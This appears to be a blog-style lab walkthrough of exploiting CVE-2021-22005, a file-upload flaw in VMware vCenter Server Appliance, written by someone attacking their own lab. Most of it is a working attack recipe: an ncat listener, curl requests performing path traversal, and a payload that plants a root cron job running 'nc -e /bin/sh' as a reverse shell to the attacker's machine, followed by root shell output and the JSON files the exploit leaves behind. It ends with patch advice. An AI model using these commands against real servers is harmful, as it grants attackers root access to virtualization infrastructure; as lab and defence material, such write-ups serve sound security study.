Say what now? Another one!

VMware announced last week in its monthly security advisory VMSA-2021-0020.1 there is a specific vulnerability in vCenter server that allows for file upload and subsequent remote code execution.
The vulnerability is tracked as CVE-2021-22005 and has a score of 9.8 (very bad :p). It affects all version of VCSA 6.7 and 7.0 except the latest patched revisions. PoC code has been released publically on Twitter and AttackKB by user wvu.

So let’s fire up our lab and give it a go!

Disclaimer, I am attacking my own infrastructure, never do this without explicit permission.
You will need 1x VCSA install, i have 7.0 Vanilla with the CIEP enabled (customer experience agent).
1 x Kali Linux installed with the tools curl and ncat installed.
For the simplicity of the lab both VMs are on the same layer 2 LAN segment.
VCSA =, Kali =

Step 1:
Open a terminal on your Kali VM and configure a listener with ncat
ncat -lv 4444

Step 2:
Set up the directory for path traversal with curl:
curl -kv "$RANDOM" -H Content-Type: -d ""

Step 3:
Attack the target VCSA telling it to create a cron job and launch a reverse shell to your Kali VM:
curl -kv "$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 4444"

Step 4:
Flip over to your ncat terminal:
──(lab㉿amnesiac)-[~] └─$ ncat -lv 4444
Ncat: Version 7.91 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from

Lets check who we are?
uid=0(root) gid=0(root) groups=0(root),1000(vami),4044(shellaccess),59005(coredump)
uname -a
Linux localhost 4.19.84-1.ph3 #1-photon SMP Tue Nov 19 00:44:01 UTC 2019 x86_64 GNU/Linux



Log files are not created with the above exploit, however json files are created which can be viewed with:
ls -l /var/log/vmware/analytics/prod/_c_i/*.json /etc/cron.d/*.json
rw-r--r-- 1 root root 49 Sep 29 13:34 /etc/cron.d/22240.json
-rw-r--r-- 1 root root 49 Sep 29 13:33 /etc/cron.d/27413.json
-rw-r--r-- 1 root root 0 Sep 29 12:17 /var/log/vmware/analytics/prod/_c_i/10284.json
-rw-r--r-- 1 root root 1 Sep 29 13:33 /var/log/vmware/analytics/prod/_c_i/12348.json

As per the VMSA the recommendation is to patch to 7.0u2c and 6.7u3o respectively.